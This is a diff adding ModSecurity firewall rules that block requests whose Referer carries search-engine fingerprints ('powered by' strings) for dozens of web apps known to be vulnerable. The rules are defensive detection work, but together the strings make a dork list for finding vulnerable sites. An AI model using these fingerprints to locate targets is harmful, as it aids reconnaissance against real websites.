+SecRule REQUEST_HEADERS:Referer   "powered by ac4p\.com gallery v1\.0 " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372623,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by ggcms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372624,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by bug software in(?:text|body):your cart contains" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372629,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by webcards" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372632,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by: virtual war v1\.5\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372636,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by phpizabi v0\.848b c1 hfp1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372640,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by clipshare" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372641,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by amcms3" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372646,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by basic cms sweetrice" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372647,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by connectix boards" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372652,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "this site is nitropowered!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372655,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by iscripts socialware" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372656,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by litecommerce" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372661,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allin(?:text|body):powered by buddy zone" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372663,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by egyplus" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372665,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dayfox designs this is a port of wordpress" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372666,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by mcgallerypro" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372667,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by tinyphpforum v3\.61" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372669,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by novaboard v1\.0\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372672,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by php director" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372675,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by one-news" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372676,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by oscommerce \| customized by ez-oscommerce" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372679,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by clanadmin tools v1\.4\.2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372682,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by iboutique v4\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372683,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by ugia php uploader v0\.2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372684,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: profitcode" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372687,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by gelato cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372694,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by elitius version 1\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372697,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by ts special edition" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372701,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by jshop" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372702,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by guruscript\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372703,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by subrion cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372705,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "site designed and built powered by globalwebtek\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372707,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by skadate dating" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372709,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by zomplog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372713,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "designed and powered by aws sports" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372714,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by gradman" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372719,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by textads 2\.08" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372727,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "copyright @ 2007 powered by hot or not clone by jnshosts\.com rate my pic :: home :: advertise :: contact us::" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372728,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by sijio - community software" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372730,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by guruscript\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372733,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: myphp forum" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372735,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by webtext" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372741,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by info fisier\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372742,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by metinfo 3\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372743,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by zylone it" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372744,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by  metinfo  2\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372748,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by  metinfo 3\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372749,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by photokorn" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372751,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by lightblog - powered by lightblog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372752,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by eclime\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372756,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by opencart" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372757,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by rw::download v2\.0\.3 lite" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372759,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: maian uploader v4\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372762,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by cmscout \(c\)2005 cmscout group" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372763,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by elitius version 1\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372769,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by exophpdesk v1\.2 final\." "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372771,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: esmile" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372775,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by power editor" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372776,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: deonixscripts\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372778,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by elitius 1\.0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372783,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by iscripts socialware" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372784,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by fantastic news v2\.1\.4" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372786,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:powered by open bulletin board" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372788,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by easysitenetwork" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372791,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by \[ isupport 1\.8 \]" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372795,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by real-estate-website" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372796,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by myhobbysite 1\.01" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372798,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by flinx" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372800,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by myupb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372802,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by phpmyrealty" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372803,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by maian greetings v2\.1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372807,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by ramaas software" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372808,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by xt-commerce" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372809,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by db masters' curium cms 1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372810,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "website powered by subdreamer cms & sequel theme designed by indiqo\.media" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372815,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dayfox designs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372816,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by phpbasket" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372819,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by how2asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372820,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by scratcher" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372822,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by ezcms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372825,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by pbboard© 2009 version 2\.0\.5" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372826,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by unak-cms" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372828,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: yes solutions" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372830,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by dolphin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372841,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by: aj square inc" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372845,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by comdev news publisher" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372846,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by sitellite" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372849,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by wonderedit pro" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372852,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by egorix" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372854,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by oscmax v2\.0 " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372856,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by words tag script" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372857,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by modx" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372858,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "powered by discuz! 1\.0 © 2002" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372861,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+
+
+
+SecMarker END_RECON_CHECKS_POWERED
+
+#warnings
+SecRule REQUEST_HEADERS:Referer "@pm warning phpaddressbook"         "id:333934,t:none,t:urlDecodeUni,t:htmlEntityDecode,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:313795,t:none,pass,nolog,noauditlog,skipAfter:END_RECON_CHECKS_WARNING"
+SecRule REQUEST_HEADERS:Referer   "warning: installation directory exists at powered by zen cart -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371613,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+
